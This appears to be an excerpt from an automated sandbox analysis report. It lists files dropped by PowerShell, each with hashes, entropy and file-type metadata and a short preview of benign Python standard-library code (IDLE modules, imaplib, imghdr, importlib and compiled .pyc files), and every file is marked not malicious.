                                                                                                    SHA-512:24D7ADFB63F8EB2E7872594534BC7880A52E628C7B6FC1F8297C1EFFE69F410719DF6B170D07A4347ED02333C63721E4137B1E0E62AD5CB5D6C832462077ED0E
                                                                                                    Malicious:false
                                                                                                    Preview:"""Line numbering implementation for IDLE as an extension...Includes BaseSideBar which can be extended for other sidebar based extensions.."""..import contextlib..import functools..import itertools....import tkinter as tk..from tkinter.font import Font..from idlelib.config import idleConf..from idlelib.delegator import Delegator..from idlelib import macosx......def get_lineno(text, index):.. """Return the line number of an index in a Tk text widget.""".. text_index = text.index(index).. return int(float(text_index)) if text_index else None......def get_end_linenumber(text):.. """Return the number of the last line in a Tk text widget.""".. return get_lineno(text, 'end-1c')......def get_displaylines(text, index):.. """Display height, in lines, of a logical line in a Tk text widget.""".. res = text.count(f"{index} linestart",.. f"{index} lineend",.. "displaylines").. return res[0] if res else 0....def get_widget_padding(widge
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13179
                                                                                                    Entropy (8bit):4.474664667987323
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:kH5cqNXb+F/88t/+7kBwNTZprBhPRvfTHZFb9aU:kZZNX631ZBwXppvb5FJ
                                                                                                    MD5:E5B38047C54D24A3247F1E941C9A6A36
                                                                                                    SHA1:E219AAA39EBF4D47049D3DE30A7B8326D01C17EE
                                                                                                    SHA-256:F0CD9C085CF31DE1411066074805BB9813E2916142787B06D23D817756A66AF6
                                                                                                    SHA-512:6D38CE40A6369EADD51B766B22A97342DA5BBB37EFD25AC8EDAB426589A648577BA223B7736DD54741AEAD4EBAC45FA4582229B1E7826D49A1DDF0564B332CAA
                                                                                                    Malicious:false
                                                                                                    Preview:"""An IDLE extension to avoid having very long texts printed in the shell.....A common problem in IDLE's interactive shell is printing of large amounts of..text into the shell. This makes looking at the previous history difficult...Worse, this can cause IDLE to become very slow, even to the point of being..completely unusable.....This extension will automatically replace long texts with a small button...Double-clicking this button will remove it and insert the original text instead...Middle-clicking will copy the text to the clipboard. Right-clicking will open..the text in a separate viewing window.....Additionally, any output can be manually "squeezed" by the user. This includes..output written to the standard error stream ("stderr"), such as exception..messages and their tracebacks..."""..import re....import tkinter as tk..from tkinter import messagebox....from idlelib.config import idleConf..from idlelib.textview import view_text..from idlelib.tooltip import Hovertip..from idlelib i
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4150
                                                                                                    Entropy (8bit):4.509368683470403
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:VovRDAIh4KvXRpdq98mv68Tx6q0rX9GBa/VGBFR3evg:VlIhNc8my8TYqQX9GgwFheI
                                                                                                    MD5:01644CBBFA1B4C0871471E9CA617728D
                                                                                                    SHA1:DD60001473E23D675CCC03FC11F0CAE8F85D3C46
                                                                                                    SHA-256:69AD3E73DCA76D13C340A4B38BA0515FFB82735F0BD079443A6FCF60B37BED4C
                                                                                                    SHA-512:B701815F9B8C0207F6D37B802E905B5D84F5EFDE0A389986AE8BDC91CBC50FAF9A0643147AC4BA9DFD7221B12F52BF8DB745B54209A899C6CAECAC02A9853799
                                                                                                    Malicious:false
                                                                                                    Preview:# Rename to stackbrowser or possibly consolidate with browser.....import linecache..import os....import tkinter as tk....from idlelib.debugobj import ObjectTreeItem, make_objecttreeitem..from idlelib.tree import TreeNode, TreeItem, ScrolledCanvas....def StackBrowser(root, exc, flist=None, top=None):.. global sc, item, node # For testing... if top is None:.. top = tk.Toplevel(root).. sc = ScrolledCanvas(top, bg="white", highlightthickness=0).. sc.frame.pack(expand=1, fill="both").. item = StackTreeItem(exc, flist).. node = TreeNode(sc.canvas, None, item).. node.expand()......class StackTreeItem(TreeItem):.... def __init__(self, exc, flist=None):.. self.flist = flist.. self.stack = self.get_stack(None if exc is None else exc.__traceback__).. self.text = f"{type(exc).__name__}: {str(exc)}".... def get_stack(self, tb):.. stack = [].. if tb and tb.tb_frame is None:.. tb = tb.tb_next.. while tb is not Non
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1526
                                                                                                    Entropy (8bit):4.718614237791998
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1ReOmAXAVjTKy6bj/jD6MOM1JWXMkjnsEp8sr4ebwK+fwrCLtkr+j4FgqHST1ae4:xmAaXvsyMObMosEppr4ef+fwAk24Wqy6
                                                                                                    MD5:CA96DB739E918298DBAAA33F5D5019A0
                                                                                                    SHA1:AB9C2B40E679F7DA8682E5598EDD518BD0161034
                                                                                                    SHA-256:0E02720448E1AF6F60311FB8A1E92D992295599E40F43EB9F11E6B9597532C9E
                                                                                                    SHA-512:CADD33B2F6A824B633A00C8EF8DDB504D7330B457D6D3703FCC838611BACD1AE66694AF4554F08F559243056F8AD9A34C06F879EF42039256E4DCCF0E3602333
                                                                                                    Malicious:false
                                                                                                    Preview:from tkinter.ttk import Label, Frame......class MultiStatusBar(Frame):.... def __init__(self, master, **kw):.. Frame.__init__(self, master, **kw).. self.labels = {}.... def set_label(self, name, text='', side='left', width=0):.. if name not in self.labels:.. label = Label(self, borderwidth=0, anchor='w').. label.pack(side=side, pady=0, padx=4).. self.labels[name] = label.. else:.. label = self.labels[name].. if width != 0:.. label.config(width=width).. label.config(text=text)......def _multistatus_bar(parent): # htest #.. from tkinter import Toplevel, Text.. from tkinter.ttk import Frame, Button.. top = Toplevel(parent).. x, y = map(int, parent.geometry().split('+')[1:]).. top.geometry("+%d+%d" %(x, y + 175)).. top.title("Test multistatus bar").... frame = Frame(top).. text = Text(frame, height=5, width=40).. text.pack().. msb = MultiStatusBar(frame)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7001
                                                                                                    Entropy (8bit):4.590203356618743
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ser4kTj541sB2ALqhGNp06D192CkkTuznFjpCFjO7yRSKEniqXti:zjNQALNNpJDn2vkM1pwKyA1nFXI
                                                                                                    MD5:C9FA767ABF303DF34A81EBAF8E3A8E98
                                                                                                    SHA1:5A4CF83ED58F0B48C8544773637C4734B2C00D3B
                                                                                                    SHA-256:35A0B4636E5232BFCF7E8B39C3645C7831ED18218EDAD644EE64B748692B20B2
                                                                                                    SHA-512:FCD1B64DEA5936FB13E952F39A78E34A252EFB1C90ECA135C58F6073CA0DBF9FF04AF56B3550C9113925AEC3923EEB118E3612231C53D8738DFD7A10032F5C18
                                                                                                    Malicious:false
                                                                                                    Preview:"""Simple text browser for IDLE...."""..from tkinter import Toplevel, Text, TclError,\.. HORIZONTAL, VERTICAL, NS, EW, NSEW, NONE, WORD, SUNKEN..from tkinter.ttk import Frame, Scrollbar, Button..from tkinter.messagebox import showerror....from idlelib.colorizer import color_config......class AutoHideScrollbar(Scrollbar):.. """A scrollbar that is automatically hidden when not needed..... Only the grid geometry manager is supported... """.. def set(self, lo, hi):.. if float(lo) > 0.0 or float(hi) < 1.0:.. self.grid().. else:.. self.grid_remove().. super().set(lo, hi).... def pack(self, **kwargs):.. raise TclError(f'{self.__class__.__name__} does not support "pack"').... def place(self, **kwargs):.. raise TclError(f'{self.__class__.__name__} does not support "place"')......class ScrollableTextFrame(Frame):.. """Display text with scrollbar(s).""".... def __init__(self, master, wrap=NONE, **kwargs):..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6657
                                                                                                    Entropy (8bit):4.541708667002856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:agWIKYUwFemoSIIHwvRhsmoHRssbVMuOF1i:dsb6HwnoHd
                                                                                                    MD5:B0157721A415E9B316CA1E06C3BFC716
                                                                                                    SHA1:A30E3AAD7DFE53013D8390F4BDFEC2532848B51A
                                                                                                    SHA-256:AB16D34C2325F556ABCD7469480915C0D85D8736E650BD9B28FE4C059A4828B0
                                                                                                    SHA-512:9B712D79FD003663A02276E068F74708034E59BDEFDBB3A91E1DF72E051E315B17B30149D4739E07459056FABCFD6E03148FBAE89382015F54647B3DF9C588CF
                                                                                                    Malicious:false
                                                                                                    Preview:"""Tools for displaying tool-tips.....This includes:.. * an abstract base-class for different kinds of tooltips.. * a simple text-only Tooltip class.."""..from tkinter import *......class TooltipBase:.. """abstract base class for tooltips""".... def __init__(self, anchor_widget):.. """Create a tooltip..... anchor_widget: the widget next to which the tooltip will be shown.... Note that a widget will only be shown when showtip() is called... """.. self.anchor_widget = anchor_widget.. self.tipwindow = None.... def __del__(self):.. self.hidetip().... def showtip(self):.. """display the tooltip""".. if self.tipwindow:.. return.. self.tipwindow = tw = Toplevel(self.anchor_widget).. # show no border on the top level window.. tw.wm_overrideredirect(1).. try:.. # This command is only needed and available on Tk >= 8.4.0 for OSX... # Without it, call tips intrude
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16986
                                                                                                    Entropy (8bit):4.58007386731682
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:pcjkQRMJC9P9baC/1CPkC99AMdzSdM5jB71dUSoHBIxy4u1J1cg0QmKqhR:2gSbOD7dcdM5jB71dUSoHEu3OFQa
                                                                                                    MD5:09320EE44E1FC2C32EADB4EE3FE1F754
                                                                                                    SHA1:310A06F1498AF7279614AC5E395D835FBF9F0DCB
                                                                                                    SHA-256:818A97B1C5FA983C14230187BE218B4E9D93029C83F8D61F543D5E48F903F931
                                                                                                    SHA-512:2E2D173C9722176D5CFB6CAFC301F721FB7335C5AF50154358CD6E6680FF61521448906A91642B34BCD195BBF19296924D42696147143978789EB9DB4C983294
                                                                                                    Malicious:false
                                                                                                    Preview:# XXX TO DO:..# - popup menu..# - support partial or total redisplay..# - key bindings (instead of quick-n-dirty bindings on Canvas):..# - up/down arrow keys to move focus around..# - ditto for page up/down, home/end..# - left/right arrows to expand/collapse & move out/in..# - more doc strings..# - add icons for "file", "module", "class", "method"; better "python" icon..# - callback for selection???..# - multiple-item selection..# - tooltips..# - redo geometry without magic numbers..# - keep track of object ids to allow more careful cleaning..# - optimize tree redraw after expand of subnode....import os....from tkinter import *..from tkinter.ttk import Frame, Scrollbar....from idlelib.config import idleConf..from idlelib import zoomheight....ICONDIR = "Icons"....# Look for Icons subdirectory in the same directory as this module..try:.. _icondir = os.path.join(os.path.dirname(__file__), ICONDIR)..except NameError:.. _icondir = ICONDIR..if os.path.isdir(_icondir):.. ICONDI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11383
                                                                                                    Entropy (8bit):4.511719236201391
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:DEd/PNOjjQnL/qgNr7NW5dxDNjDdX09yIhlZsH8laGI:DEhNOnTxX8DZc
                                                                                                    MD5:EA05DC2E3F25E1CD6230F73E26568F56
                                                                                                    SHA1:9389E80A4CEDB61D63AF876E391430C7B0E682DC
                                                                                                    SHA-256:966CDBDF0984B3ABE6B87B4A9CC816F6D177FFB15420096B742C9E9F0ADD06B3
                                                                                                    SHA-512:68889960E16CDB1CEAA705A1F76D22235A576AD5911BC25F39D79C6E53A5DFB26FE8D4E0196AEE233D26C4ABDB74BA0C0F04FB993001392793711AD2CD05A99E
                                                                                                    Malicious:false
                                                                                                    Preview:import string....from idlelib.delegator import Delegator....# tkinter import not needed because module does not create widgets,..# although many methods operate on text widget arguments.....#$ event <<redo>>..#$ win <Control-y>..#$ unix <Alt-z>....#$ event <<undo>>..#$ win <Control-z>..#$ unix <Control-z>....#$ event <<dump-undo-state>>..#$ win <Control-backslash>..#$ unix <Control-backslash>......class UndoDelegator(Delegator):.... max_undo = 1000.... def __init__(self):.. Delegator.__init__(self).. self.reset_undo().... def setdelegate(self, delegate):.. if self.delegate is not None:.. self.unbind("<<undo>>").. self.unbind("<<redo>>").. self.unbind("<<dump-undo-state>>").. Delegator.setdelegate(self, delegate).. if delegate is not None:.. self.bind("<<undo>>", self.undo_event).. self.bind("<<redo>>", self.redo_event).. self.bind("<<dump-undo-state>>", self.dump_event)....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):753
                                                                                                    Entropy (8bit):4.722288748345001
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:UlUf+Eun9e2ANhTH+AXF+UpQjRyT20+SXq+R6Fo+7Fm2+3Vf7hALFwWh2a/jFBb5:UlUf+TeRrL/XFhPq0bsFpFm2QVqL2apj
                                                                                                    MD5:DA9E17743C92A739E71598EE6DD72729
                                                                                                    SHA1:0C358DE8B7A671E02B355D4DA29B0A91C08FD04B
                                                                                                    SHA-256:546CE11669CD8988D97E62E0A42F6E74EEF40595D4273DE7CA93ED218498F950
                                                                                                    SHA-512:4AC8C8A3680C4B3D9C65CB24BB46DDD337E4C75C3364D86F3BE982AA9EF1E074C8812606F92C189AA8DFD5C309048ACA3DFBC56D97DE400989CB81534D58CF11
                                                                                                    Malicious:false
                                                                                                    Preview:"""..Idlelib objects with no external idlelib dependencies..which are needed in more than one idlelib module.....They are included here because.. a) they don't particularly belong elsewhere; or.. b) because inclusion here simplifies the idlelib dependency graph.....TODO:.. * Python versions (editor and help_about),.. * tk version and patchlevel (pyshell, help_about, maxos?, editor?),.. * std streams (pyshell, run),.. * warning stuff (pyshell, run)..."""....# .pyw is for Windows; .pyi is for typing stub files...# The extension order is needed for iomenu open/save dialogs...py_extensions = ('.py', '.pyw', '.pyi')....if __name__ == '__main__':.. from unittest import main.. main('idlelib.idle_test.test_util', verbosity=2)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2714
                                                                                                    Entropy (8bit):4.364875797912291
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:RFG4V7uS3t1XfTm7wpb9pv8exu3MTsMCm+W/Ocd7/QE7I:RFG4Mo3mspb9pvCcsNm+2hNI
                                                                                                    MD5:C8EEEFB89218A863B90D43F2F614B810
                                                                                                    SHA1:3F867D48D54D68CBF45A07B873243FFA03AD506C
                                                                                                    SHA-256:85919A4F823AA687DEFADB6716E2B01B0FE74C21E7EBDA950B8CBEEDD1EFB3F2
                                                                                                    SHA-512:D71CDBAA878B39674C2C7108543B7681C54866D7BB69DDCA211D7BC9A701F057E8B601592949BC0CA1B76842D5FDE13ECD774CDDD8CFAF69F77DCBA0A7672081
                                                                                                    Malicious:false
                                                                                                    Preview:from tkinter import Toplevel, TclError..import sys......class WindowList:.... def __init__(self):.. self.dict = {}.. self.callbacks = [].... def add(self, window):.. window.after_idle(self.call_callbacks).. self.dict[str(window)] = window.... def delete(self, window):.. try:.. del self.dict[str(window)].. except KeyError:.. # Sometimes, destroy() is called twice.. pass.. self.call_callbacks().... def add_windows_to_menu(self, menu):.. list = [].. for key in self.dict:.. window = self.dict[key].. try:.. title = window.get_title().. except TclError:.. continue.. list.append((title, key, window)).. list.sort().. for title, key, window in list:.. menu.add_command(label=title, command=window.wakeup).... def register_callback(self, callback):.. self.callbacks.append(callback)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4327
                                                                                                    Entropy (8bit):4.400672770818723
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XEmcp8//FNMFJc4f/dxj5l6zdR5e3LChSBZ5:Xns8//GJcS155lodten
                                                                                                    MD5:201370943D09BB9AA42BC66F53934AE2
                                                                                                    SHA1:3CCC4E7A1285680BCC815DF75433B0AA17C823F0
                                                                                                    SHA-256:E3A6E578F3FEA8A1F834CBA273C5722CCAB726A394956637EEB02650B7E3B60D
                                                                                                    SHA-512:BED4D3D7D7688BBC8E11D768557AE77C868AD34DE925EA22586D3B89B0C7F1D5EA4B345B0CE4126E4A69F31C933937C5FFFB6D93F7F08AA657AD2E7CAE2B8D83
                                                                                                    Malicious:false
                                                                                                    Preview:"Zoom a window to maximum height."....import re..import sys..import tkinter......class WmInfoGatheringError(Exception):.. pass......class ZoomHeight:.. # Cached values for maximized window dimensions, one for each set.. # of screen dimensions... _max_height_and_y_coords = {}.... def __init__(self, editwin):.. self.editwin = editwin.. self.top = self.editwin.top.... def zoom_height_event(self, event=None):.. zoomed = self.zoom_height().... if zoomed is None:.. self.top.bell().. else:.. menu_status = 'Restore' if zoomed else 'Zoom'.. self.editwin.update_menu_label(menu='options', index='* Height',.. label=f'{menu_status} Height').... return "break".... def zoom_height(self):.. top = self.top.... width, height, x, y = get_window_geometry(top).... if top.wm_state() != 'normal':.. # Can't zoom/restore window height for wind
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2078
                                                                                                    Entropy (8bit):4.566681866757483
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:0BeUBtdoBcXHs4Q70JD9Xpd5r7CiwJa3oeBanFHyQx:0BewEW8p70J5XvYZE5MFHz
                                                                                                    MD5:14BF96284FBE73F8A04B4FCA75165305
                                                                                                    SHA1:FB232E504B35355164C8D38350E5751A558A8358
                                                                                                    SHA-256:CD44C3950F2380FBC654D444D8917CD3A144B88CA523917D522537BFBB41F519
                                                                                                    SHA-512:8910D7132E71D9C65F79D838942BAFCCBF0F2F2AA236C1A396819B1A26E642B1BF100BDE3B8C66CA7819DA3CBA2661DBBBB40223F5FB2ED0CF44EDC1ADF5A937
                                                                                                    Malicious:false
                                                                                                    Preview:"""Example extension, also used for testing.....See extend.txt for more details on creating an extension...See config-extension.def for configuring an extension..."""....from idlelib.config import idleConf..from functools import wraps......def format_selection(format_line):.. "Apply a formatting function to all of the selected lines.".... @wraps(format_line).. def apply(self, event=None):.. head, tail, chars, lines = self.formatter.get_region().. for pos in range(len(lines) - 1):.. line = lines[pos].. lines[pos] = format_line(self, line).. self.formatter.set_region(head, tail, chars, lines).. return 'break'.... return apply......class ZzDummy:.. """Prepend or remove initial text from selected lines.""".... # Extend the format menu... menudefs = [.. ('format', [.. ('Z in', '<<z-in>>'),.. ('Z out', '<<z-out>>'),.. ] ).. ].... def __init__(self, editwin):.. "Initialize t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55320
                                                                                                    Entropy (8bit):4.698963047894621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:LxnlDansQeIBol2eKsBKOgE1IFWv4wem8fCY17JTBY:L9lWsQ5el2eKs4OgE1IFwDem8fN5Ri
                                                                                                    MD5:3A49CC9459497FBB42C7ADA13F6FCEA8
                                                                                                    SHA1:74751D80FB62412994BC1716B1AF9052E8C579FC
                                                                                                    SHA-256:12C34D60B9F7BE521F898E13D72B7F1D2BBEDC87C71F9C00140FFB4593E2FB3C
                                                                                                    SHA-512:E2DBDC1099C574BD02A90F9C41D6CC4D827A3177C009C6C6F11CA5870DA95869CFEB774638D0DAD5CC33C5BC731000897323AE6B17AC817B2B1FDD8C2454BCF3
                                                                                                    Malicious:false
                                                                                                    Preview:"""IMAP4 client.....Based on RFC 2060.....Public class: IMAP4..Public variable: Debug..Public functions: Internaldate2tuple.. Int2AP.. ParseFlags.. Time2Internaldate.."""....# Author: Piers Lauder <piers@cs.su.oz.au> December 1997...#..# Authentication code contributed by Donn Cave <donn@u.washington.edu> June 1998...# String method conversion by ESR, February 2001...# GET/SETACL contributed by Anthony Baxter <anthony@interlink.com.au> April 2001...# IMAP4_SSL contributed by Tino Lange <Tino.Lange@isg.de> March 2002...# GET/SETQUOTA contributed by Andreas Zeidler <az@kreativkombinat.de> June 2002...# PROXYAUTH contributed by Rick Holbert <holbert.13@osu.edu> November 2002...# GET/SETANNOTATION contributed by Tomas Lindroos <skitta@abo.fi> June 2005.....__version__ = "2.58"....import binascii, errno, random, re, socket, subprocess, sys, time, calendar..from datetime import datetime, timezone, tim
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4578
                                                                                                    Entropy (8bit):4.76441763929676
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:MwbND3M4HLBZ6Wl/wH6wLZ6L3KkZPaQG6q8GjHjKkz:MWD77IhQCpjHjKkz
                                                                                                    MD5:316394ACA6BF6A5AF7996A6143E0AECE
                                                                                                    SHA1:6B119E846026FCF24034E4F7292E996D92C6E6E1
                                                                                                    SHA-256:F6BE0B302E7D4B7F0A9A32085AD69BEBBC735E704B9BE68510E3D9009C3E83F4
                                                                                                    SHA-512:7EBE465294186E5D83FEE8BA5DFE92CE67FFA9F6A99B963C7495227D3930224AAA4B1F17F516D9EB1FF16C6F708A696BEAACFFE96CF99FFAF862B31D002DD01F
                                                                                                    Malicious:false
                                                                                                    Preview:"""Recognize image file formats based on their first few bytes."""....from os import PathLike..import warnings....__all__ = ["what"]......warnings._deprecated(__name__, remove=(3, 13))......#-------------------------#..# Recognize image headers #..#-------------------------#....def what(file, h=None):.. """Return the type of image contained in a file or byte stream.""".. f = None.. try:.. if h is None:.. if isinstance(file, (str, PathLike)):.. f = open(file, 'rb').. h = f.read(32).. else:.. location = file.tell().. h = file.read(32).. file.seek(location).. for tf in tests:.. res = tf(h, f).. if res:.. return res.. finally:.. if f: f.close().. return None......#---------------------------------#..# Subroutines per image file type #..#---------------------------------#....tests = []....def test_jpeg(h, f):.. """Test f
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4912
                                                                                                    Entropy (8bit):4.6319009488503635
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4tH2fRvVSnhV4kSSNOyKGk+SNplpIZvYZwPbBbrx1x410aKZt9RH++3mTatLxhV:glz4vSNGGXSNV4bRrp41vKZt9RJmOtVb
                                                                                                    MD5:BCA19823F6D3DA9AC57114B681CF3F4F
                                                                                                    SHA1:4B4AC01ABE65A7CE3752343F9681EAD705274E0E
                                                                                                    SHA-256:96DC7E6276BEAF680D6576917173FD67B1260BC3B10BB7324F481C424ECB3F4E
                                                                                                    SHA-512:B995194B78FCFA4C5E66B84DDF2FAC2AEA2C51E20BB26DA6FF57AC4ED195ADD3D9375A12CA9FFB3DFE7A485BF4741727682EF7CF1175C5C9AEFD9A282ED3E574
                                                                                                    Malicious:false
                                                                                                    Preview:"""A pure Python implementation of import."""..__all__ = ['__import__', 'import_module', 'invalidate_caches', 'reload']....# Bootstrap help #####################################################....# Until bootstrapping is complete, DO NOT import any modules that attempt..# to import importlib._bootstrap (directly or indirectly). Since this..# partially initialised package would be present in sys.modules, those..# modules would get an uninitialised copy of the source version, instead..# of a fully initialised version (either the frozen one or the one..# initialised below if the frozen one is not available)...import _imp # Just the builtin component, NOT the full Python module..import sys....try:.. import _frozen_importlib as _bootstrap..except ImportError:.. from . import _bootstrap.. _bootstrap._setup(sys, _imp)..else:.. # importlib._bootstrap is the built-in import, ensure we don't create.. # a second copy of the module... _bootstrap.__name__ = 'importlib._bootstrap
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4604
                                                                                                    Entropy (8bit):5.669797918679033
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ohxU9e1bkBCmgxK1sWAS+CZCxDzm2xA9P8M+XALOPYa:Kk0JK1FAS+RxmIukwe
                                                                                                    MD5:64D514A7CB73371EA6AB6513B655CB79
                                                                                                    SHA1:72DBA4DFF6FF2815A1401E008AB6D6B8934A3BA4
                                                                                                    SHA-256:09D2EBAFB65AC255A19AD8BA73542470E9359C95FF5D997457FECCEF3ADF45A0
                                                                                                    SHA-512:FC056BCF7F17EE8D2CED692CB4EF31498CC775734E98A290C44A56991ABFDE354F98028AD2AA1DBFD2418652C4C4587F5B746A0D593B094103E53FDE57EA75FF
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f0.........................,.....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.e._.........d.e._...........e.j...................d.d.........e._.........e.e.j...................d.<.....d.d.l.Z.d.e._.........d.e._...........e.j...................d.d.........e._.........e.e.j...................d.<...e.j$..................Z.e.j&..................Z.d.d.l.Z.d.d.l.m.Z...d...Z.d.d...Z.i.Z.d...Z.y.#.e.$.r...Y...w.x.Y.w.#.e.$.r...d.d.l.m.Z.....e.j...................e.e...........Y...w.x.Y.w.#.e.$.r...Y..tw.x.Y.w.#.e.$.r"..d.d.l.m.Z.....e.j"..................e...........e.e._.........Y...w.x.Y.w.).z'A pure Python implementation of import.)...__import__..import_module..invalidate_caches..reload.....Nz.importlib._bootstrap..importlibz.__init__.pyz._bootstrap.py.....)..._bootstrapz.importlib._bootstrap_externalz._bootstrap_external.py)..._bootstrap_external).r....c.....................h.....t.........j...................D.]...}.t.........|.d.........s...|.j..............................!..y.).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1682
                                                                                                    Entropy (8bit):5.129938721233459
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:hCJUrqm4haCXN2TrX/I7ChNIu8CiqIwxb9FReg+L+CVVR9Vz8R1wtAjZn:cJUOnsTrDCqj9FKx9R8R1yYn
                                                                                                    MD5:270E8795DCC53622C83AAB1F40CAD782
                                                                                                    SHA1:8BA032F150D80A0A1277D80F4CDD4B8EB6402A7A
                                                                                                    SHA-256:9DBE9C4E380C4778DF3DEFB0E5D711849D4F74FB624A2F926E282667054776EC
                                                                                                    SHA-512:86368107149EC80FB188363BAB645AB56C2F6148FA6FF083DB849F630C5B446B7BBD9EAC05D8AFBA9E4DCAAEE3515DCD7A64B74EC9C6014F6782AD2B09F90FA2
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fq.........................H.....d.Z.d.d.l.m.Z...d.d.l.Z...G.d...d.e.j.............................Z.y.).z>Subset of importlib.abc used to reduce importlib.util imports......)..._bootstrap.....Nc...........................e.Z.d.Z.d.Z.d...Z.d...Z.y.)...Loaderz'Abstract base class for import loaders.c...........................y.).z.Return a module to initialize and into which to load... This method should raise ImportError if anything prevents it. from creating a new module. It may return None to indicate. that the spec should create the new module.. N..)...self..specs.... .LC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\_abc.py..create_modulez.Loader.create_module....s................c.....................R.....t.........|.d.........s.t...........t.........j...................|.|.........S.).a....Return the loaded module... The module must be added to sys.modules and have import-related. attributes set properl
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10455
                                                                                                    Entropy (8bit):5.241708548074997
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ZOoAj+k16K3an/5qq3MsPMbDA9ntVSGz03czkDgcn:cnjG/5qq3veA9ntB5QM4
                                                                                                    MD5:D8FD11DD74255621C5070B8476A34598
                                                                                                    SHA1:CAE32FA91948C4D88D8B95CB96C6CD5CC1EEFCCE
                                                                                                    SHA-256:4635DA14C6CB646F0D707E60F972DEC34AF4A2DFEAADE7B0D29BBF147B329E70
                                                                                                    SHA-512:D1BE677EE20259CF245AADAB6A91E105DA3BF55547023533B7552293CA371B9370FEEBB23418E06A59E1FA90AD3E21E3ADF822DFC49E23701223C561E924837E
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f..........................4.....d.Z.d.d.l.m.Z...d.d.l.m.Z.....d.d.l.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d...Z.d...Z...G.d...d.e.j$............................Z...e.e.e.j(..................e.j*..................e.j,..................e.j...............................G.d...d.e.j$............................Z...e.e.e.j2..............................G.d...d.e.........Z...G.d...d.e.........Z...e.e.e.j(..................e.j*..................e.j8..............................G.d...d.e.........Z...e.e.e.j<..............................G.d...d.e.j>..................e.e.........Z...e.e.e.j@..................e.jB..............................G.d...d.e.jD..................e.e.........Z"..e.e"e.j@............................y.#.e.$.r.Z.e.j...................d.k7..r...d.Z.Y.d.Z.[....pd.Z.[.w.w.x.Y.w.#.e.$.r...e.Z.Y....}w.x.Y.w.).z(Abstract base classes related to import......)..._bootstrap_external)...machinery.....N.._frozen_importlib)...Loader)...abc).r......Me
